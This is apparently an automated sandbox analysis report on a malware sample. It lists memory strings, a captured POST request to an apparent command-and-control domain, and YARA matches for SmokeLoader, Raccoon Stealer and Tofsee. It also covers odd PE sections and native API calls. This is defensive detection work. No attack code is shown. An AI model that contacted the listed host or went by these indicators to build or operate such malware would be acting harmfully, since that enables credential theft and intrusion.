Source: 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mys equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mys equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mys equals www.youtube.com (Youtube)
Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO", equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO", equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO", equals www.youtube.com (Youtube)
Source: svchost.exe, 0000000D.00000003.463680555.000001D408B9D000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6
Source: svchost.exe, 0000000D.00000003.463680555.000001D408B9D000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6
Source: svchost.exe, 0000000D.00000003.463680555.000001D408B9D000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: geenaldencia9.top
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49837 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 20.1.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.435450242.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.504353493.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: pAWNholT8X.exe, 00000000.00000002.364361089.000000000064A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 0000001E.00000002.653738313.000000000114D000.00000002.00020000.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

barindex
Yara detected Tofsee
Source: Yara match File source: 00000023.00000002.626408703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.600346866.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.639383457.0000000000610000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
PE file contains section with special chars
Source: 8433.exe.6.dr Static PE information: section name:
Source: 8433.exe.6.dr Static PE information: section name:
Source: 8433.exe.6.dr Static PE information: section name:
Source: 8433.exe.6.dr Static PE information: section name: MSI GF65
Source: 8433.exe.6.dr Static PE information: section name: MSI GF65
Source: CEB6.exe.6.dr Static PE information: section name:
Source: CEB6.exe.6.dr Static PE information: section name:
Source: CEB6.exe.6.dr Static PE information: section name:
Source: CEB6.exe.6.dr Static PE information: section name: Intel Co
Source: CEB6.exe.6.dr Static PE information: section name: Intel Co
Source: FE25.exe.6.dr Static PE information: section name: RAM 8GB
Source: FE25.exe.6.dr Static PE information: section name: RAM 8GB
Source: FE25.exe.6.dr Static PE information: section name: RAM 8GB
Detected potential crypto function
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_0040238C 0_2_0040238C
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_0040238C 16_2_0040238C
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_02B7E210 17_2_02B7E210
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_02B7B990 17_2_02B7B990
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_02B7EA38 17_2_02B7EA38
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_02B7EA29 17_2_02B7EA29
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051B0040 17_2_051B0040
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051CA7D8 17_2_051CA7D8
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051CDED8 17_2_051CDED8
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C83D0 17_2_051C83D0
Source: C:\Users\user\AppData\Local\Temp\8433.exe Code function: 19_2_05810AC1 19_2_05810AC1
Source: C:\Users\user\AppData\Local\Temp\8433.exe Code function: 19_2_05810AD0 19_2_05810AD0
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 22_2_0271ED28 22_2_0271ED28
PE file contains strange resources
Source: pAWNholT8X.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pAWNholT8X.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pAWNholT8X.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pAWNholT8X.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6CB1.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6CB1.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6CB1.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6CB1.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E52D.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E52D.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E52D.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FE25.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ecrjwib.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ecrjwib.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ecrjwib.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ecrjwib.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Uses 32bit PE files
Source: pAWNholT8X.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Yara signature match
Source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: Process Memory Space: 757C.exe PID: 5560, type: MEMORYSTR Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Contains functionality to call native functions
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_004019A9 Sleep,NtTerminateProcess, 4_2_004019A9
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_0040194C Sleep,NtTerminateProcess, 4_2_0040194C
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_0040196C Sleep,NtTerminateProcess, 4_2_0040196C
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_00402610 NtClose, 4_2_00402610
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_0040163E NtMapViewOfSection, 4_2_0040163E
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_0040223E NtQuerySystemInformation, 4_2_0040223E
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_004019CB Sleep,NtTerminateProcess, 4_2_004019CB
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_004020CC NtQuerySystemInformation, 4_2_004020CC
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_004019D4 NtTerminateProcess, 4_2_004019D4
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_00401592 NtAllocateVirtualMemory, 4_2_00401592
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_004019B6 Sleep,NtTerminateProcess, 4_2_004019B6
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_004015BC NtAllocateVirtualMemory, 4_2_004015BC
